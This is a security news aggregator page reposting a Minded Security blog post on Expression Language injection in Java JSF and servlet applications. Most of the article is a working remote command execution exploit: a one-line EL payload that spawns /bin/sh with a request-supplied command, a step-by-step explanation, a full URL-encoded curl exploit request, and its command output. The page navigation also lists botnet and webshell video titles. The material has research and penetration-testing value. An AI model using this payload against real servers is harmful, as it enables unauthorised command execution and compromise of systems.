Contribuez à SecuObs en envoyant des bitcoins ou des dogecoins.
Nouveaux articles (fr): 1pwnthhW21zdnQ5WucjmnF3pk9puT5fDF
Amélioration du site: 1hckU85orcGCm8A9hk67391LCy4ECGJca

Contribute to SecuObs by sending bitcoins or dogecoins.

Chercher :
Newsletter :  


Revues :
- Presse
- Presse FR
- Vidéos
- Twitter
- Secuobs





Sommaires :
- Tendances
- Failles
- Virus
- Concours
- Reportages
- Acteurs
- Outils
- Breves
- Infrastructures
- Livres
- Tutoriels
- Interviews
- Podcasts
- Communiques
- USBsploit
- Commentaires


Revue Presse:
- Tous
- Francophone
- Par mot clé
- Par site
- Le tagwall


Top bi-hebdo:
- Ensemble
- Articles
- Revue
- Videos
- Twitter
- Auteurs


Articles :
- Par mot clé
- Par auteur
- Par organisme
- Le tagwall


Videos :
- Toutes
- Par mot clé
- Par site
- Le tagwall


Twitter :
- Tous
- Par mot clé
- Par compte
- Le tagwall


Commentaires :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS/XML :
- Articles
- Commentaires
- Revue
- Revue FR
- Videos
- Twitter


RSS SecuObs :
- sécurité
- exploit
- windows
- attaque
- outil
- microsoft


RSS Revue :
- security
- microsoft
- windows
- hacker
- attack
- network


RSS Videos :
- curit
- security
- biomet
- metasploit
- biometric
- cking


RSS Twitter :
- security
- linux
- botnet
- attack
- metasploit
- cisco


RSS Comments :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS OPML :
- Français
- International











Revue de presse francophone :
- Appaloosa AppDome nouent un partenariat pour accompagner les entreprises dans le déploiement et la protection des applications mobiles
- D-Link offre une avec un routeur VPN sans fil AC
- 19 mai Paris Petit-Déjeuner Coreye Développer son business à l'abri des cyberattaques
- POYNTING PRESENTE LA NOUVELLE ANTENNE OMNI-291, SPECIALE MILIEU MARITIME, CÔTIER ET MILIEU HUMIDE
- Flexera Software Les utilisateurs français de PC progressent dans l'application de correctifs logiciels, mais des défis de tailles subsistent
- Riverbed lance SD-WAN basé sur le cloud
- Fujitsu multi-récompensé VMware lui décerne plusieurs Partner Innovation Awards à l'occasion du Partner Leadership Summit
- Zscaler Private Access sécuriser l'accès à distance en supprimant les risques inhérents aux réseaux privés virtuels
- QNAP annonce la sortie de QTS 4.2.1
- Une enquête réalisée par la société de cyber sécurité F-Secure a décelé des milliers de vulnérabilités graves, potentiellement utilisables par des cyber criminels pour infiltrer l'infrastru
- Trouver le juste équilibre entre une infrastructure dédiée et cloud le dilemme de la distribution numérique
- 3 juin - Fleurance - Cybersécurité Territoires
- Cyber-assurances Seules 40 pourcents des entreprises françaises sont couvertes contre les violations de sécurité et les pertes de données
- Des étudiants de l'ESIEA inventent CheckMyHTTPS un logiciel qui vérifie que vos connexions WEB sécurisées ne sont pas interceptées
- Les produits OmniSwitch d'Alcatel-Lucent Enterprise ALE gagnent en sécurité pour lutter contre les cyber-attaques modernes

Dernier articles de SecuObs :
- DIP, solution de partage d'informations automatisée
- Sqreen, protection applicative intelligente de nouvelle génération
- Renaud Bidou (Deny All): "L'innovation dans le domaine des WAFs s'oriente vers plus de bon sens et d'intelligence, plus de flexibilité et plus d'ergonomie"
- Mises à jour en perspective pour le système Vigik
- Les russes ont-ils pwn le système AEGIS ?
- Le ministère de l'intérieur censure une conférence au Canada
- Saut d'air gap, audit de firmware et (in)sécurité mobile au programme de Cansecwest 2014
- GCHQ: Le JTRIG torpille Anonymous qui torpille le JTRIG (ou pas)
- #FIC2014: Entrée en territoire inconnu
- Le Sénat investit dans les monnaies virtuelles

Revue de presse internationale :
- VEHICLE CYBERSECURITY DOT and Industry Have Efforts Under Way, but DOT Needs to Define Its Role in Responding to a Real-world Attack
- Demand letter served on poll body over disastrous Comeleak breach
- The Minimin Aims To Be The Simplest Theremin
- Hacking group PLATINUM used Windows own patching system against it
- Hacker With Victims in 100 Nations Gets 7 Years in Prison
- HPR2018 How to make Komboucha Tea
- Circuit Bender Artist bends Fresnel Lens for Art
- FBI Director Suggests iPhone Hacking Method May Remain Secret
- 2016 Hack Miami Conference May 13-15, 2016
- 8-bit Video Wall Made From 160 Gaming Keyboards
- In An Era Of Decline, News Sites Can t Afford Poor Web Performance
- BeautifulPeople.com experiences data breach 1m affected
- Swedish Air Space Infringed, Aircraft Not Required
- Why cybercriminals attack healthcare more than any other industry
- Setting the Benchmark in the Network Security Forensics Industry

Annuaire des videos
- FUZZING ON LINE PART THREE
- Official Maltego tutorial 5 Writing your own transforms
- Official Maltego tutorial 6 Integrating with SQL DBs
- Official Maltego tutorial 3 Importing CSVs spreadsheets
- install zeus botnet
- Eloy Magalhaes
- Official Maltego tutorial 1 Google s websites
- Official Maltego tutorial 4 Social Networks
- Blind String SQL Injection
- backdoor linux root from r57 php shell VPS khg crew redc00de
- How To Attaque Pc With Back Track 5 In Arabique
- RSA Todd Schomburg talks about Roundup Ready lines available in 2013
- Nessus Diagnostics Troubleshooting
- Panda Security Vidcast Panda GateDefender Performa Parte 2 de 2
- MultiPyInjector Shellcode Injection

Revue Twitter
- RT @fpalumbo: Cisco consistently leading the way ? buys vCider to boost its distributed cloud vision #CiscoONE
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- An inexpensive proxy service called is actually a front for #malware distribution -

Mini-Tagwall
Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone

+ de mots clés pour la revue de presse

Annuaires des videos : curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit

+ de mots clés pour les videos

Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall

+ de mots clés pour la revue Twitter

Top bi-hebdo des articles de SecuObs
- [Ettercap – Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing
- [Infratech - release] version 0.6 de Bluetooth Stack Smasher
- [IDS Snort Windows – Partie 2] Installation et configuration
- [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Mises à jour en perspective pour le système Vigik
- USBDumper 2 nouvelle version nouvelles fonctions !
- EFIPW récupère automatiquement le mot de passe BIOS EFI des Macbook Pro avec processeurs Intel
- La sécurité des clés USB mise à mal par USBDUMPER
- Une faille critique de Firefox expose les utilisateurs de Tor Browser Bundle
- Installation sécurisée d'Apache Openssl, Php4, Mysql, Mod_ssl, Mod_rewrite, Mod_perl , Mod_security

Top bi-hebdo de la revue de presse
- StackScrambler and the Tale of a Packet Parsing Bug

Top bi-hebdo de l'annuaire des videos
- DC++ Botnet. How To DDos A Hub With Fake IPs.
- Comment creer un server botnet!!!!(Réseau de pc zombies)
- Defcon 14 Hard Drive Recovery Part 3

Top bi-hebdo de la revue Twitter
- RT @secureideas: I believe that all the XSS flaws announced are fixed in CVS. Will test again tomorrow if so, release 1.4.3. #BASESnort
- Currently, we do not support 100% of the advanced PDF features found in Adobe Reader... At least that's a good idea.
- VPN (google): German Foreign Office Selects Orange Business for Terrestrial Wide: Full
- @DisK0nn3cT Not really, mostly permission issues/info leak...they've had a couple of XSS vulns but nothing direct.
- Swatting phreaker swatted and heading to jail: A 19-year-old American has been sentenced to eleven years in pris..
- RT @fjserna You are not a true hacker if the calc.exe payload is not the scientific one... infosuck.org/0x0035.png

Top des articles les plus commentés
- [Metasploit 2.x – Partie 1] Introduction et présentation
- Microsoft !Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques
- Webshag, un outil d'audit de serveur web
- Les navigateurs internet, des mini-systèmes d’exploitation hors de contrôle ?
- Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G
- CAINE un Live[CD|USB] pour faciliter la recherche légale de preuves numériques de compromission
- Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation
- [Renforcement des fonctions de sécurité du noyau Linux – Partie 1] Présentation
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- Origami pour forger, analyser et manipuler des fichiers PDF malicieux

Reliable OS Shell with - EL Expression Language - Injection

Si vous voulez bloquer ce service sur vos fils RSS
Si vous voulez nous contacter ou nous proposer un fil RSS

Menu > Articles de la revue de presse : - l'ensemble [tous | francophone] - par mots clé [tous] - par site [tous] - le tagwall [voir] - Top bi-hebdo de la revue de presse [Voir]

S'abonner au fil RSS global de la revue de presse



Reliable OS Shell with - EL Expression Language - Injection

Par Minded Security Blog
Le [2015-11-23] à 17:07:16



Présentation : Abusing EL for executing OS Commands ------------------------------------ Expression Language injection Wow It may lead to remote command execution on modern Servlet environments. This was pointed out by Dan Amodio in 2012 with his art work exploit against Spring Double-Evaluation vulnerability CVE-2011-2730 . Herein he ported the exploitation technique presented in this Vulnerability Research Paper by Minded Security and Aspect Security in 2011 to newer Servlet versions reaching RCE Remote Code Execution, which implies Remote Command Execution as well . In this blog post we discuss a different payload code to exploit an Expression Language Injection security issue in a reliable way. This is somehow the case during penetration tests of sensitive targets where it's important to not alter the local application by downloading external content or modifying the local file-system. EL Injection example in a JSF Facelets Environment index.xhtml gets expression parameter from the request and sends it to evalAsString Hello from Facelets NewClass.java implements ELAsString that an EL implementation that evaluates arguments dynamically import java.io.Serializable import javax.el.ELContext import javax.el.ExpressionFactory import javax.el.ValueExpression import javax.faces.bean.ManagedBean import javax.faces.bean.SessionScoped import javax.faces.context.FacesContext ManagedBean name beanEL SessionScoped public class NewClass implements Serializable public static String ELAsString String p_expression FacesContext context FacesContext.getCurrentInstance ExpressionFactory expressionFactory context.getApplication .getExpressionFactory ELContext elContext context.getELContext ValueExpression vex expressionFactory.createValueExpression elContext, p_expression, String.class String result String vex.getValue elContext return result Why a One-Liner OS command shell payload The rules of this OS command shell game - Not rely on loading classes that are on external servers e.g. Avoid Egress filtering, External class loading etc. - Work on a broad number of EL versions and servers e.g. not only on Tomcat 8 - Executing an OS command - Interactive output from EL injection Os command output should be Redirected to the current HTTP response in-band - Not write any file and or modify any other persistent resource - Achieve all the previous with One single line of concatenated EL Final payload facesContext.getExternalContext .getResponse .setContentType text plain charset UTF-8 session.setAttribute scriptfactory , .getClass .forName javax.script.ScriptEngineManager .newInstance session.setAttribute scriptengine ,session.getAttribute scriptfactory .getEngineByName JavaScript session.getAttribute scriptengine .getContext .setWriter facesContext.getExternalContext .getResponse .getWriter session.getAttribute scriptengine .eval var proc new java.lang.ProcessBuilder java.lang.String bin sh , -c , .concat request.getParameter cmd .concat .start var is proc.getInputStream var sc new java.util.Scanner is, UTF-8 var out while sc.hasNext out sc.nextLine String.fromCharCode 10 print out facesContext.getExternalContext .getResponse .getWriter .flush facesContext.getExternalContext .getResponse .getWriter .close Payload Explained Feel free to change it and modify it to fit your current target. 1 Setting the charset System.out.println URLEncoder.encode pf.enc.encrypt request.getResponse .setContentType text plain charset UTF-8 2 Invoking ScriptManager constructor without arguments and we store the instance as a session object session.setAttribute scriptfactory , .getClass .forName javax.script.ScriptEngineManager .newInstance , session.setAttribute scriptengine ,session.getAttribute scriptfactory .getEngineByName JavaScript 3 Redirect ScriptEngine output writer output to the Http Response writer input session.setAttribute scriptengine ,session.getAttribute scriptfactory .getEngineByName JavaScript , session.getAttribute scriptengine .getContext .setWriter facesContext.getExternalContext .getResponse .getWriter 4 Call the eval method for the engine JavaScript that accepts JS code as string sometimes Jetty 8.2 gives a java.io.Reader with the JS code that executes the runtime command session.getAttribute scriptengine .eval new java.lang.ProcessBuilder java.lang.String bin sh , -c , .concat request.getParameter cmd .concat .start 5 Getting proc standard Output and reading it via java.util.Scanner and printing it out var is proc.getInputStream var sc new java.util.Scanner is, UTF-8 var out while sc.hasNext out sc.nextLine String.fromCharCode 10 print out 5 Closing the http response facesContext.getExternalContext .getResponse .getWriter .close Is a Servlet Modern enough for a reliable RCE JSP EL should be at least at version 2.2. EL version goes hand in hand with Servlet JSP version which is dependent on the servletcontainer implementation version used and also on the web.xml root declaration of your web application. Servlet 3.0 comes with JSP EL 2.2 and we usually find those in Tomcat 7, Jetty 8.2, Jetty 9 Servlet 2.5 comes with JSP EL 2.1. Servlet 2.4 comes with JSP EL 2.0. Servlet 2.3 comes with JSP 1.2 without EL. Note Newer servers like Tomcat 8 and 9 have even newer servlet versions and better capabilities, but our target was running Jetty 9.1. In 2012 Dan Amodio from Aspect Security http danamodio.com appsec research spring-remote-code-with-expression-language-injection discovered that While performing a penetration test on a client s application on Glassfish, I learned that the EL 2.2 added support for method invocation. Try and load the org.springframework.expression.spel.standard.SpelExpressionParser... We failed many times . Unfortunately EL 2.2 method invocation is sneaky and has several bugs in its implementation that do not make it behave properly. The following one is the invokeMethod implementation in Servlet 2.2 and is possible to see that it may not work if more than one argument is passed. This is a boring limitation since we can only invoke or call a limited number of methods private Object invokeMethod Method m, Object base, Object params 764 Class parameterTypes m.getParameterTypes 765 Object parameters null 766 if parameterTypes.length 0 767 ExpressionFactory exprFactory getExpressionFactory 768 if m.isVarArgs 771 parameters new Object parameterTypes.length 772 for int i 0 i parameterTypes.length i 773 parameters i exprFactory.coerceToType params i , parameterTypes i try 779 return m.invoke base, parameters If you are exploiting a web server different from Glassfish there is also an additional option the Java JavaScript Engine. JavaScript Engine is blocked in Glassfish EL implementation but not in other servers such as Apache Tomcat 7 or Jetty. JS Rhino Script Engine is supported in Java 6 and 7, Mozilla Nashorn Script Engine is available from Java 8. For more information Rhino https docs.oracle.com javase 7 docs api javax script ScriptEngineManager.html Nashorn https docs.oracle.com javase 8 docs api javax script ScriptEngineManager.html Since ScriptEngineManager has an empty class constructor this can be abused by the method invocation technique from EL 2.2 pointed out earlier. Exploit Payload request n0def n0def curl 'http localhost 8080 WebApplication cmd lspourcents20 expression pourcents24 facesContext.getExternalContextpourcents28pourcents29.getResponsepourcents28pourcents29.setContentTypepourcents28pourcents22textpourcents2fplainpourcents3bpourcents0Acharsetpourcents3d pourcents22UTF-8 pourcents22pourcents22pourcents29 pourcents24 session.setAttributepourcents28pourcents22scriptfactorypourcents22pourcents2cpourcents22pourcents22.getClasspourcents28pourcents29.forNamepourcents28pourcents22javax.script.ScriptEngineManagerpourcents22pourcents29.newInstancepourcents28pourcents29pourcents29 pourcents24 session.setAttributepourcents28pourcents22scriptenginepourcents22pourcents2csession.getAttributepourcents28pourcents22scriptfactorypourcents22pourcents29.getEngineByNamepourcents28pourcents22JavaScriptpourcents22pourcents29pourcents29 pourcents24 session.getAttributepourcents28pourcents22scriptenginepourcents22pourcents29.getContextpourcents28pourcents29.setWriterpourcents28facesContext.getExternalContextpourcents28pourcents29.getResponsepourcents28pourcents29.getWriterpourcents28pourcents29pourcents29 pourcents24 session.getAttributepourcents28pourcents22scriptenginepourcents22pourcents29.evalpourcents28pourcents22varpourcents0Aprocpourcents20pourcents3dpourcents20newpourcents0Ajava.lang.ProcessBuilder pourcents22pourcents28java.lang.String pourcents29 pourcents22 pourcents28 pourcents22pourcents2fbinpourcents2fsh pourcents22pourcents2c pourcents22-c pourcents22pourcents2c pourcents22pourcents22.concatpourcents28request.getParameterpourcents28pourcents22cmdpourcents22pourcents29pourcents29.concatpourcents28pourcents22 pourcents22 pourcents29.startpourcents28pourcents29pourcents3bpourcents0Avarpourcents20ispourcents20pourcents3dpourcents20proc.getInputStreampourcents28pourcents29pourcents3bpourcents20varpourcents20scpourcents20pourcents3dpourcents20newpourcents0Ajava.util.Scannerpourcents28ispourcents2c pourcents22UTF-8 pourcents22pourcents29pourcents3bpourcents20varpourcents20outpourcents20pourcents3dpourcents20 pourcents22 pourcents22pourcents3bpourcents20whilepourcents0Apourcents28sc.hasNextpourcents28pourcents29pourcents29pourcents20 outpourcents20pourcents2bpourcents3dpourcents20sc.nextLinepourcents28pourcents29pourcents2bString.fromCharCodepourcents2810pourcents29pourcents3b pourcents0Aprintpourcents28outpourcents29pourcents3bpourcents22pourcents29pourcents29 pourcents24 facesContext.getExternalContextpourcents28pourcents29.getResponsepourcents28pourcents29.getWriterpourcents28pourcents29.flushpourcents28pourcents29 pourcents24 facesContext.getExternalContextpourcents28pourcents29.getResponsepourcents28pourcents29.getWriterpourcents28pourcents29.closepourcents28pourcents29 ' Exploit Payload Response bin boot cdrom dev etc home initrd.img initrd.img.old lib lost found media mnt opt proc root run sbin srv swapfile sys tmp usr var vmlinuz vmlinuz.old n0def n0def

Les mots clés de la revue de presse pour cet article : shell
Les videos sur SecuObs pour les mots clés : shell
Les mots clés pour les articles publiés sur SecuObs : shell
Les éléments de la revue Twitter pour les mots clé : shell



AddThis Social Bookmark Widget



Les derniers articles du site "Minded Security Blog" :

- RCE in Oracle NetBeans Opensource Plugins PrimeFaces 5.x Expression Language Injection
- RAT WARS 2.0 Advanced Techniques for Detecting RAT Screen Control
- Request parameter method may lead to CakePHP CSRF Token Bypass
- Reliable OS Shell with - EL Expression Language - Injection
- Software Security in practice
- Advanced JS Deobfuscation Via AST and Partial Evaluation Google Talk WrapUp
- Autoloaded File Inclusion in Magento SOAP API SUPEE-6482
- PDF-based polyglots through SVG images CVE-2015-5092
- Multiple security issues discovered in Concrete5
- Antitamper Mobile - Minded Security's Magik Quadrant for Mobile Code Protection




S'abonner au fil RSS global de la revue de presse

Menu > Articles de la revue de presse : - l'ensemble [tous | francophone] - par mots clé [tous] - par site [tous] - le tagwall [voir] - Top bi-hebdo de la revue de presse [Voir]



Si vous voulez bloquer ce service sur vos fils RSS :
- avec iptables "iptables -A INPUT -s 88.190.17.190 --dport 80 -j DROP"
- avec ipfw et wipfw "ipfw add deny from 88.190.17.190 to any 80"
- Nous contacter par mail




SecuToolBox :

Mini-Tagwall des articles publiés sur SecuObs :

Mini-Tagwall de l'annuaire video :

Mini-Tagwall des articles de la revue de presse :

Mini-Tagwall des Tweets de la revue Twitter :